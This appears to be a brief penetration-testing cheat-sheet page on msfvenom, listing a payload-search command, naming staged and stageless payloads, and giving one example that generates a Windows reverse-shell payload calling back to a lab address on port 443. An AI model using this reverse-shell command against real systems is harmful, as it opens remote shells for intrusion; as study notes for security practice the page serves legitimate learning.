🔫Exploitation Frameworks

MFSVenom

msfvenom --l all | grep <Payload>

Types of payload

  • Staged payloads

  • Stageless payloads

Payload example

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload

Last updated

Was this helpful?